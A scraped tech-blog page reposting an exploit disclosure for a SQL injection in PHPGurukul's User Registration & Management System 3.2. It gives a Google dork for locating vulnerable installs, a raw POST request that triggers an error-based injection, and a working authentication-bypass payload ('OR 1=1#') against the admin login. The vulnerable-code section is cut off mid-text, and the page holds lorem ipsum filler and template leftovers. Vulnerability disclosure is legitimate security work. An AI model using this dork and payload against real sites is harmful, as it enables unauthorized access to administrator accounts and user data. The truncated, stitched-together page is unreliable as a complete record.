• +33 877 554 332
  • info@website.com
PHL Tech Magazine

Post: User Registration & Management System – SQLi (fixed typo)

coder_prem

coder_prem

Hi, I'm Prem. I'm professional WordPress Web Developer. I developed this website. And writing articles about Finance, Startup, Business, Marketing and Tech is my hobby.
Hope you will always get informative articles which will help you to startup your business.
If you need any kind of wordpress website then feel free to contact me at webexpertprem@gmail.com

Categories

Recent Posts


User Registration & Management System – SQLi (fixed typo)

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.:. Exploit Title > User Registration & Management System – SQLi
.:. Google Dorks .:.
inurl:loginsystem/index.php
.:. Date: June 18, 2024
.:. Exploit Author: bRpsd
.:. Contact: cy(at)live.no
.:. Vendor -> https://phpgurukul.com/
.:. Product -> https://phpgurukul.com/?sdm_process_download=1&download_id=7003
.:. Product Version -> Version 3.2
.:. DBMS -> MySQL
.:. Tested on > macOS (*nix Darwin Kernel), on local xampp
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#############
|DESCRIPTION|
#############
“User Management System is a web based technology which manages user database and provides rights to update the their details In this web application user must be registered. This web application provides a way to effectively control record & track the user details who himself/herself registered with us.”
===========================================================================================
Vulnerability 1: Unauthenticated SQL Injection & Authentication bypass
Types: error-based
File: localhost/admin/index.php
Vul Parameter: USERNAME (POST)
POST PoC #1: http://tom:8080/loginsystem/admin/index.php
Host: tom
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://tom
Connection: keep-alive
Referer: http://tom/loginsystem/admin/index.php
Cookie: PHPSESSID=fca5cef217b48f9ec0221b75695e4f2a
Upgrade-Insecure-Requests: 1
username=’&password=test&login=
Response: Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in /Applications/XAMPP/xamppfiles/htdocs/loginsystem/admin/index.php on line 9
===========================================================================================
Test #2 => Payload to skip authentication
http://localhost:9000/loginsystem/admin/index.php
username=A’ OR 1=1#&password=1&login=
Response:
302 redirect to dashboard.php
===========================================================================================
Vuln File:/loginsystem/admin/index.php
Vul Code:
0)

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:’yyyy-MM-dd’ }} {{ x.ux * 1000 | date:’HH:mm’ }} CET+1

{{ x.comment }}

The post User Registration & Management System – SQLi (fixed typo) appeared first on DIGITALIVE.WORLD.

Lora Helmin

Lora Helmin

Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Popular Posts

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

Reducing Workplace Allergies and Asthma with Commercial Cleaning Services
Entrepreneurship
Ryan October 21, 2024

Reducing Workplace Allergies and Asthma with…

Microsoft to launch autonomous AI agents in November – Computerworld
Tech
coder_prem October 21, 2024

Microsoft to launch autonomous AI agents…

Leveraging a Digital-First Mindset for Business Success
Finance
coder_prem October 21, 2024

Leveraging a Digital-First Mindset for Business…

PHL Tech Magazine

“PHL TECH Magazine is your go-to online destination for all things tech. Stay updated with the latest news, trends, and innovations in the world of technology. Explore in-depth articles, interviews, and reviews that delve into the exciting realm of gadgets, software, startups, and more. Join our vibrant community and immerse yourself in the ever-evolving world of tech with PHL TECH Magazine.”

About PHL TECH MAGAZINE

Your one-stop source for startup, business, finance, and tech news. Stay informed with our timely articles on innovation, entrepreneurship, and the latest industry trends.

Recent Posts

Get interesting news

Subscribe to our newsletter and we’ll send you the emails of latest posts.

2023 PHL TECH MAGAZINE. All rights reserved. Designed with CoderPrem.